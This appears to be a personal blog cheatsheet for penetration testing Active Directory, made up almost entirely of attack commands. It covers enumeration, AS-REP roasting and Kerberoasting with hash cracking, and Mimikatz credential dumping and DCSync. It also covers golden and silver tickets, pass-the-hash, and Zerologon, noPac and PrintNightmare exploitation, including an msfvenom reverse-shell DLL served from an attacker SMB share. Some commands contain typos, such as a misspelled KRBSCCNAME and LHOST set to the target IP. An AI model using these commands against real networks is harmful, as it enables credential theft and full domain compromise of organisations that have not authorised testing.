This is a cheatsheet of tools and commands that I use to pentest Active Directory. It includes Windows, Impacket and PowerView commands, how to use Bloodhound and popular exploits such as Zerologon and NO-PAC.

See local accounts

net user

See all of the accounts in the domain

net user /domain

Check if an account is a Domain Admin

net user <account-name> domain

See groups in the AD domain

net group /domain

Sync the clock with the DC (Domain Controller).

ntpdate <dc-ip>

. .\PowerView.ps1

Information about the domain

Get-NetDomain

Get-NetDomain-Controller

Get-Domain-Policy

See password rules

(Get-DomainPolicy)."system access"

Information about users Look for passwords/personal information in the description

Get-NetUser

Get-NetUser | select cn

Get-NetUser | select description

Get-NetUser | select samaccountname

Get-UserProperty -Properties pwdlastset

Get-UserProperty -Properties logoncount

Information about computers

Get-NetComputer

Get-NetComputer -FullData

Get-NetGroup

Get-NetGroup -GroupName <group-name>

Get-NetGroup -GroupName "Domain Admins"

Get-NetGroupMember -GroupName "Domain Admins"

See SMB shares

Invoke-ShareFinder

A few quick commands that I always use if I have no information about the machine

crackmapexec smb <ip>

crackmapexec smb <ip> -u '' -p ''

crackmapexec smb <ip> -u 'guest' -p ''

With a list of valid usernames and no passwords, you can check if Kerberos has pre-authentication disabled by ASREP-Roasting

impacket-GetNPUsers -format john -dc-ip <dc-ip> -usersfile <users-list> <name_of_domain>/<hostname>

or

python3 GetNPUsers.py <domain>/<user> -no-pass -dc-ip <dc-ip>

To crack obtained hashes, save them in a file and give it to John. I usually use rockyou.txt to brute-force the passwords

john --wordlist=<passwords-file> <hashes-file>

Alternative

hashcat -m 18200 -a 0 <hashes-file> <passwords-file>

If you obtained any passwords, check them

crackmapexec smb <ip> -U <user> -p <password>

If they are valid, further enumerate the domain

crackmapexec smb <ip> -U <user> -p <password> --shares

crackmapexec smb <ip> -U <user> -p <password> --rid-brute

crackmapexec smb <ip> -U <user> -p <password> --users

crackmapexec smb <ip> -U <user> -p <password> --lsa

Try to connect using Windows Remote Management

crackmapexec winrm <ip> -U <user> -p <password>

Try to connect using pass-the-hash (the user needs to have administrative rights)

pth-winexe -U <user>%<hash>%<SMB-share-in-UNC-format> //<ip> cmd

Two different ways to perform this attack.

1. From your attacking machine, using Impacket

   impacket-GetUserSPNs -dc-ip <ip> <domain>/<user>

   If successful

   impacket-GetUserSPNs -dc-ip <ip> <domain>/<user> --request

   To crack the hash

   hashcat -m 13100 -a 0 <hash> <wordlist> --force

2. On the target machine, using Mimikatz

   Generate tickets in Powershell

   Add-Type -AssemblyName System.IdentityModel

   New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList '<service>/<hostname>.<domain>.com'

   klist

   In Mimikatz

   kerberos::list /export

   Grab the tickets and crack them

   python /usr/share/kerberoast/tgsrepcrack.py <wordlist> <tickets>

If you managed to get access on the machine and you are able to transfer Mimikatz, you can use the following commands.

privilege::debug

Dump credentials of all logged-in users

sekurlsa::logonpasswords

lsadump::lsa /patch

Dump the SAM database (equivalent to hashdump in a Meterpreter shell)

token::elevate

lsadump::sam

Overpass-the-hash

sekurlsa::pth /user:<username> /domain:<domain-name> /ntlm:<ntlm-hash> /run:PowerShell.exe

Pass-the-ticket (silver ticket)

Get the SID of the user

whoami /user

In Mimikatz

kerberos::purge kerberos::golden /user:<username> /domain:<domain-name> /sid:<sid> /target:<url> /service:<service> /rc4:<rc4hash> /ptt

If you have a silver ticket, connect using Impacket

export KRBSCCNAME=<path-to-silver-ticket>

impacket-wmiexec -k -no-pass <username>@<domain>

Golden ticket

If we get the krbtgt (password hash of domain user account), we can create our own golden tickets = custom TGTs)

Get the krbtgt

privilege::debug

lsadump::lsa /patch

kerberos::purge

Create a golden ticket

kerberos::golden /user:<fake-username> /domain:<domain> /sid:<sid> /krbtgt:<krbtgt-hash> /ptt

Launch a new cmd

misc::cmd

Use PsExec to escalate privileges

psexec.exe \<dc-name> cmd.exe

DC-SYNC

lsadump::dcsync /user:Administrator

Bloodhound needs an ingestor to retrieve files that then have to be uploaded in the application lying on your attack machine.

Bloodhound-Python

bloodhound-python -c All -u <user> -p <password> -gc '<hostname>.<domain-name>' -dc '<hostname>.<domain-name>' -d '<domain-name>' -ns <dc-ip>

Sharphound

You can use Sharphound two ways.

1. Transfer the .exe file (which you can download from here: https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors) on the target machine and run it with the following command

   SharpHound.exe -c All

2. Transfer the Sharphound.ps1 Powershell script on the target machine and run it

   . .\SharpHound.ps1

   Invoke-Bloodhound -CollectionMethod All -Domain <domain-name> -ZipFileName loot.zip

This exploit should be used very carefully and with the guarantee that it can be reversed. It changed the domain controller's password and interrupts communication with other computers in the domain. To test the vulnerability without exploiting it, I used the following script: https://github.com/SecuraBV/CVE-2020-1472

python3 zerologon_tester.py <DC-name> <DC-ip>

To exploit it, you can find the Zerologon exploit here: https://github.com/dirkjanm/CVE-2020-1472, as well as restoration steps.

python3 cve-2020-1472-exploit.py <DC-name> <DC-ip>

Get all of the information (usernames + hashes)

impacket-secretsdump -just-dc <domain>/<DC-name>$@<DC-ip>

To restore

Get the lanman_hash:ntlm_hash from the output of the previous command

impacket-secretsdump administrator@<DC-ip> -hashes <lanman_hash:ntlm_hash>

Obtain the plaintext password from the output of the previous command

python3 restorepassword.py <domain>/<DC-name>@<DC-name> -target-ip <DC-ip> -hexpass <plaintext-password>

This exploit is possible if you have any valid credentials from a user in the Active Directory. You can find the exploit here: https://github.com/WazeHell/sam-the-admin

python3 sam_the_admin.py -dc-ip <DC-ip> <domain>/<user>:<password>

You can find the exploit here: https://github.com/cube0x0/CVE-2021-1675

For this exploit, you need valid user credentials.

Check if the system is vulnerable:

rpcdump.py <target-ip> | egrep 'MS-RPRN|MS-PAR'

If you get Print System Asynchronous Remote Protocol & Print System Remote Protocol in the output, it is vulnerable.

Create a .dll file to execute the reverse shell

msfvenom -p windows/x64/meterpreter/reverse_tcp -ax64 -f dll LHOST=<target-ip> LPORT=<target-port> > shell.dll

Start a listener on the port used in the command.

Host the file on Samba

smbserver.py share pwd -smb2support

python3 CVE-2021-1675.py <domain>/<user>:<password>@<target-ip> '\<attacking-machine-ip>\share\shell.dll'

Some cheatsheets that I've used in the past and I've found very useful are:

https://github.com/S1ckB0y1337/Active-Directory-Exploitation-Cheat-Sheet

https://gist.github.com/Rajchowdhury420/da4d12a3db13aa5232fcd4e7d96ec6a1

https://gist.github.com/TarlogicSecurity/2f221924fef8c14a1d8e29f3cb5c5c4a